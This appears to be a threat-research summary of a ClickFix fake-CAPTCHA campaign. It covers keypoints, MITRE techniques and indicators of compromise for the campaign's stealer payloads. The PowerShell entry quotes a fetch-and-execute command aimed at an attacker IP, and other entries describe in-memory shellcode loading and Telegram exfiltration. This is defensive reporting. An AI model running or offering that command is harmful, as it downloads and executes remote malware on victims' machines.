Threat Research

Fake CAPTCHA Campaign: Inside a Multi-Stage Stealer Assault

LevelBlue-spiderlabs
Fake CAPTCHA Campaign: Inside a Multi-Stage Stealer Assault

LevelBlue documents a multi-stage, fileless ClickFix campaign that compromises legitimate websites to present fake CAPTCHA prompts which coerce users into executing clipboard-pasted PowerShell commands, enabling in-memory payload delivery via Donut shellcode. The infrastructure is payload-agnostic and rotates multiple commodity stealers and a cryptocurrency clipboard hijacker across numerous C2 servers and fake crypto-exchange sites. #ClickFix #LummaStealer

Keypoints

  • Attackers compromised a broad network of legitimate websites to inject malicious JavaScript that loads fake CAPTCHA pages from attacker-controlled domains, redirecting visitors into the ClickFix flow.
  • The ClickFix initial-access social engineering instructs users to open the Windows Run dialog (Win+R) and paste an attacker-placed PowerShell command from the clipboard to execute a staged in-memory loader.
  • Staged delivery uses PowerShell to download and execute scripts in memory, which then load Donut-generated shellcode (cptch.bin) via VirtualAlloc/Marshal::Copy/CreateThread, leaving minimal disk artifacts.
  • The campaign is payload-agnostic and observed rotating at least six distinct final payload families (StealC/Lumma, Lumma Stealer, clipx64 clipboard hijacker, Vidar, Aura, Rhadamanthys) from the same delivery infrastructure.
  • Operators leveraged a large cluster of cryptocurrency-themed web templates and >3,000 exchange-like domains (likely from a commercially sold script) to present fake exchange interfaces and harvest credentials alongside malware delivery.
  • Defensive recommendations emphasize behavior-based detection: monitor for clipboard-based command execution, suspicious Run-dialog PowerShell invocations, in-memory loaders, and unusual outbound HTTP connections following such activity; user awareness about never pasting/executing Run-dialog commands is critical.

MITRE Techniques

  • [T1204 ] User Execution – Social engineering ClickFix prompt coerces users to open the Run dialog and paste/execute a PowerShell command. (‘the prompt instructs the victim to open the Windows Run dialog via Win+R, paste a pre-staged command from their clipboard via Ctrl+V, and execute it.’)
  • [T1059.001 ] PowerShell – Initial command uses PowerShell to fetch and execute a first-stage script in memory. (‘powershell -c iex(irm 158.94.209.33 -UseBasicParsing)’)
  • [T1105 ] Ingress Tool Transfer – Staged scripts and payload binaries are downloaded from attacker-controlled servers via HTTP. (‘the malicious PowerShell command … retrieve a script from the first-stage server via Invoke-RestMethod and immediately execute it in memory’)
  • [T1055 ] Process Injection – Loader allocates executable memory (VirtualAlloc), copies shellcode (Marshal::Copy), and spawns a thread to run shellcode entirely in memory. (‘allocates a region of executable memory using VirtualAlloc with PAGE_EXECUTE_READWRITE permissions, copies the downloaded shellcode into it via Marshal::Copy, and spawns a new thread via CreateThread’)
  • [T1027 ] Obfuscated Files or Information – Final .NET assemblies are encrypted at rest and decrypted at runtime before in-memory loading. (‘the .NET assembly contained within is encrypted at rest and decrypted at runtime by cptchbuild.bin before being loaded entirely in memory’)
  • [T1071.001 ] Application Layer Protocol: Web Protocols – C2 and payload retrieval occur over HTTP(S) to attacker servers during execution. (‘HTTP traffic showing the malware downloading cptchbuild.bin (186 KB) from the C2 server.’)
  • [T1041 ] Exfiltration Over C2 Channel – Several stealers exfiltrate harvested data via web APIs and C2 channels, including Telegram Bot API methods. (‘Direct references to Telegram Bot API methods SendDocument and SendMessage confirm the exfiltration channel.’)
  • [T1497 ] Virtualization/Sandbox Evasion (anti-analysis) – JavaScript detects open Developer Tools and deliberately freezes execution using repeated debugger statements and an infinite loop to hinder analysis. (‘it detects when browser Developer Tools are opened and intentionally freezes the page by triggering repeated debugger statements and an infinite loop’)

Indicators of Compromise

  • [IP Address ] Stage servers and C2 – 158.94.209.33 (stage 1 dropper), 94.154.35.115 (payload/C2), and other IPs such as 178.16.53.70 and 107.150.0.79.
  • [Domains ] Fake CAPTCHA and redirect domains serving clipboard hijack scripts – cptoptious[.]com, captoolsz[.]com, and capztoolz[.]com, captioto[.]com, namzcp[.]org, vision-clouds[.]org (and multiple additional domains).
  • [C2 / Exchange-related Domains ] Malware and exchange infrastructure domains observed as C2 or fake exchange fronts – alipico[.]com, sodstreams[.]com, yago[.]fun, agfoodpos[.]com, mushub[.]cfd, searchservice[.]cfd.
  • [File Names ] In-memory loaders and payloads observed – cptch.bin, cptchbuild.bin, cs.bin (Lumma/StealC), clipx64.bin (clipboard hijacker), myscript.exe and ayaqeecl.dll (Rhadamanthys dropper components).
  • [Script Paths / URLs ] Malicious script injection points and repository paths – goveanrs[.]org/jsrepo (injected script) and C2 gate paths such as /gate2hj45g2kway/lpr307k4[.]ka879 referenced by Rhadamanthys.
  • [Hashes ] Payload hashes header present in report but no specific file hashes were listed in the provided article excerpt.

Read more: https://www.levelblue.com/blogs/spiderlabs-blog/fake-captcha-campaign-inside-a-multi-stage-stealer-assault